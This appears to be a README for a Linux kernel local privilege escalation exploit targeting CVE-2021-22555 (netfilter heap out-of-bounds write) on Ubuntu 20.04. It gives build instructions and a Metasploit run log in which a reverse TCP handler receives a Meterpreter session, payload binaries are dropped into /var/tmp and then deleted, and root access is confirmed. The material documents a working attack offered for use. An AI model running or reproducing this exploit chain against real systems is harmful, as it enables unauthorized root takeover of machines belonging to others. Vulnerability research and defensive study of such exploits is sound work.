LPE exploit for CVE-2021-22555. Tested on Ubuntu 20.04 kernel 5.8.0-48-generic.

The vulnerability was discovered by Andy Nguyen [@theflow0](https://twitter.com/theflow0).

Author: [Szymon Janusz](https://github.com/szymonj99)

For educational/research purposes only. Use at your own risk.

## Usage

The exploit binary **must** be built on a Linux environment, as it relies on the Linux kernel header files.

To build:

```
make ubuntu
```

To run:

```
msf6 exploit(linux/local/netfilter_xtables_heap_oob_write_priv_esc) > run

[*] Started reverse TCP handler on 192.168.1.145:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target is running kernel release 5.8.0-48-generic.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/var/tmp/flTJOaqhI' (734660 bytes) ...
[*] Uploading payload...
[*] Writing '/var/tmp/ckaFBkiL' (250 bytes) ...
[*] Running payload on remote system...
[*] Sending stage (3012548 bytes) to 192.168.1.67
[+] Deleted /var/tmp/flTJOaqhI
[+] Deleted /var/tmp/ckaFBkiL
[*] Meterpreter session 2 opened (192.168.1.145:4444 -> 192.168.1.67:43322) at 2021-09-28 14:20:41 +0100
[*] Payload executed!

meterpreter > getuid
Server username: root @ ubuntu-virtual-machine (uid=0, gid=0, euid=0, egid=0)
```

Check out the original writeup: [CVE-2021-22555: Turning \x00\x00 into 10000$](https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html).